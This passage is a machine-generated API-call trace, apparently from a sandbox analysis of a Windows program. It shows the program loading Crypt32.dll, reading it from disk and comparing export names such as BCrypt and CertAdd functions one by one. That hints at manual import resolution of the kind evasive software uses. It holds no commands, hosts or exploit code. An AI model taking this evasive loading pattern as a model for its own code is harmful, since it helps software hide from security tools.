lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKey") returned 1 [0262.808] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyCapi") returned 1 [0262.808] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0262.808] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyHash") returned 1 [0262.808] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyKey") returned 1 [0262.808] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroySecret") returned 1 [0262.808] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateHash") returned 1 [0262.808] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateKey") returned 1 [0262.808] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEncrypt") returned 1 [0262.808] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEnumAlgorithms") returned 0 [0262.809] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunction") returned 1 [0262.809] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunctionProvider") returned 1 [0262.809] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0262.809] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContext") returned 1 [0262.809] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContextFunction") returned 1 [0262.809] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateContext") returned 1 [0262.809] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateHash") returned 1 [0262.809] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateMultiHash") returned 1 [0262.809] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDecrypt") returned 1 [0262.809] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeleteContext") returned 1 [0262.809] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKey") returned 1 [0262.809] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyCapi") returned 1 [0262.809] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0262.809] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyHash") returned 1 [0262.809] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyKey") returned 1 [0262.809] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroySecret") returned 1 [0262.809] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateHash") returned 1 [0262.809] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateKey") returned 1 [0262.809] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEncrypt") returned 1 [0262.809] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumAlgorithms") returned 1 [0262.809] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumContextFunctionProviders") returned 0 [0262.810] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunction") returned 1 [0262.810] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunctionProvider") returned 1 [0262.810] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0262.810] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContext") returned 1 [0262.810] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContextFunction") returned 1 [0262.810] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateContext") returned 1 [0262.810] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateHash") returned 1 [0262.810] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateMultiHash") returned 1 [0262.810] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDecrypt") returned 1 [0262.810] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeleteContext") returned 1 [0262.810] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKey") returned 1 [0262.810] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyCapi") returned 1 [0262.810] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0262.810] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyHash") returned 1 [0262.810] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyKey") returned 1 [0262.810] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroySecret") returned 1 [0262.810] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateHash") returned 1 [0262.810] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateKey") returned 1 [0262.812] GetProcessHeap () returned 0x4a0000 [0262.812] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d92010 | out: hHeap=0x4a0000) returned 1 [0262.813] GetProcessHeap () returned 0x4a0000 [0262.813] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b9060 [0262.814] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffc5c190000 [0262.823] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0262.823] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0262.824] GetModuleFileNameA (in: hModule=0x7ffc5c190000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0262.824] CreateFileA (lpFileName="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0262.825] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0262.825] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0262.825] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1847520) returned 1 [0262.825] GetProcessHeap () returned 0x4a0000 [0262.825] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1c30e0) returned 0x4151040 [0262.831] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0262.831] ReadFile (in: hFile=0x160, lpBuffer=0x4151040, nNumberOfBytesToRead=0x1c30e0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4151040*, lpNumberOfBytesRead=0x14f5a4*=0x1c30e0, lpOverlapped=0x0) returned 1 [0262.966] CloseHandle (hObject=0x160) returned 1 [0262.966] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertAddCRLContextToStore") returned 0 [0262.966] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0262.966] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 0 [0262.966] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLContextToStore") returned 1 [0262.966] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0262.967] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCTLContextToStore") returned 0 [0262.967] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0262.967] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0262.967] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLContextToStore") returned 1 [0262.967] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLLinkToStore") returned 0 [0262.967] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLContextToStore") returned -1 [0262.967] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0262.967] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLContextToStore") returned -1 [0262.967] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0262.967] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCertificateContextToStore") returned 0 [0262.967] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLContextToStore") returned -1 [0262.967] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0262.967] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLContextToStore") returned -1 [0262.967] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0262.967] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0262.967] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateLinkToStore") returned 0 [0262.967] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0262.967] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0262.967] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0262.967] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0262.967] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0262.967] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0262.967] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddEncodedCRLToStore") returned 0 [0262.968] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0262.968] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0262.968] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0262.968] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0262.968] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0262.968] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0262.968] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0262.968] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCTLToStore") returned 0 [0262.968] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLContextToStore") returned 1 [0262.968] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0262.968] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLContextToStore") returned 1 [0262.968] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0262.968] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0262.968] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0262.968] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCRLToStore") returned -1 [0262.968] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCTLToStore") returned -1 [0262.968] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCertificateToStore") returned 0 [0262.969] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLContextToStore") returned 1 [0262.969] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLLinkToStore") returned 1 [0262.969] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLContextToStore") returned 1 [0262.969] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLLinkToStore") returned 1 [0262.969] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateContextToStore") returned 1 [0262.969] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateLinkToStore") returned 1 [0262.969] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCRLToStore") returned -1 [0262.969] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCTLToStore") returned -1 [0262.969] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToStore") returned 1 [0262.969] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 0 [0262.969] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLContextToStore") returned 1 [0262.969] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLLinkToStore") returned 1 [0262.969] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLContextToStore") returned 1 [0262.969] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLLinkToStore") returned 1 [0262.969] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateContextToStore") returned 1 [0262.969] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateLinkToStore") returned 1 [0262.969] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCRLToStore") returned -1 [0262.969] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCTLToStore") returned -1 [0262.969] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToStore") returned 1 [0262.969] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0262.969] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 0 [0262.969] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLContextToStore") returned 1 [0262.969] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLLinkToStore") returned 1 [0262.970] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLContextToStore") returned 1 [0262.970] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLLinkToStore") returned 1 [0262.970] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateContextToStore") returned 1 [0262.970] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateLinkToStore") returned 1 [0262.970] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCRLToStore") returned 1 [0262.970] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCTLToStore") returned 1 [0262.970] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToStore") returned 1 [0262.970] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0262.970] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0262.970] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 0 [0262.970] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0262.970] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0262.970] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0262.970] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0262.970] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0262.970] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0262.970] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0262.970] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0262.970] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0262.970] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0262.970] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0262.970] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0262.970] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 0 [0262.971] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLContextToStore") returned 1 [0262.971] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLLinkToStore") returned 1 [0262.971] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLContextToStore") returned 1 [0262.971] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLLinkToStore") returned 1 [0262.971] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateContextToStore") returned 1 [0262.971] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateLinkToStore") returned 1 [0262.971] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCRLToStore") returned 1 [0262.971] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCTLToStore") returned 1 [0262.971] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToStore") returned 1 [0262.971] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0262.971] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0262.971] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0262.971] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponse") returned 1 [0262.971] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponseContext") returned 0 [0262.971] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLContextToStore") returned 1 [0262.971] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0262.971] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLContextToStore") returned 1 [0262.971] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0262.971] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0262.971] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0262.971] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0262.971] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0262.971] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0262.971] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0262.971] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0262.971] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0262.971] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0262.972] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0262.972] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddSerializedElementToStore") returned 0 [0262.972] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLContextToStore") returned 1 [0262.972] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLLinkToStore") returned 1 [0262.972] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLContextToStore") returned 1 [0262.972] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLLinkToStore") returned 1 [0262.972] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateContextToStore") returned 1 [0262.972] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateLinkToStore") returned 1 [0262.972] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCRLToStore") returned 1 [0262.972] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCTLToStore") returned 1 [0262.972] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToStore") returned 1 [0262.972] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0262.972] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0262.972] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0262.972] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponse") returned 1 [0262.972] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0262.972] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddSerializedElementToStore") returned 1 [0262.972] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddStoreToCollection") returned 0 [0262.972] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLContextToStore") returned 1 [0262.972] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLLinkToStore") returned 1 [0262.972] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLContextToStore") returned 1 [0263.106] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLLinkToStore") returned 1 [0263.106] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateContextToStore") returned 1 [0263.106] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateLinkToStore") returned 1 [0263.106] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCRLToStore") returned 1 [0263.106] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCTLToStore") returned 1 [0263.106] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToStore") returned 1 [0263.106] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0263.106] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0263.106] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0263.106] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponse") returned 1 [0263.106] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0263.106] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddSerializedElementToStore") returned 1 [0263.106] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddStoreToCollection") returned 1 [0263.106] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAlgIdToOID") returned 0 [0263.106] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0263.106] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0263.106] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0263.106] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0263.106] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0263.106] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0263.106] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0263.107] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0263.107] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0263.107] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0263.107] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0263.107] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0263.107] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 1 [0263.107] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0263.107] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddSerializedElementToStore") returned 1 [0263.107] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddStoreToCollection") returned 1 [0263.107] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAlgIdToOID") returned 1 [0263.107] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertCloseServerOcspResponse") returned 0 [0263.107] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLContextToStore") returned 1 [0263.107] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLLinkToStore") returned 1 [0263.107] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLContextToStore") returned 1 [0263.107] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLLinkToStore") returned 1 [0263.107] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateContextToStore") returned 1 [0263.107] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0263.107] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0263.107] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0263.107] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0263.107] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0263.107] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0263.107] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0263.108] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0263.108] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0263.108] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddSerializedElementToStore") returned 1 [0263.108] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddStoreToCollection") returned 1 [0263.108] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAlgIdToOID") returned 1 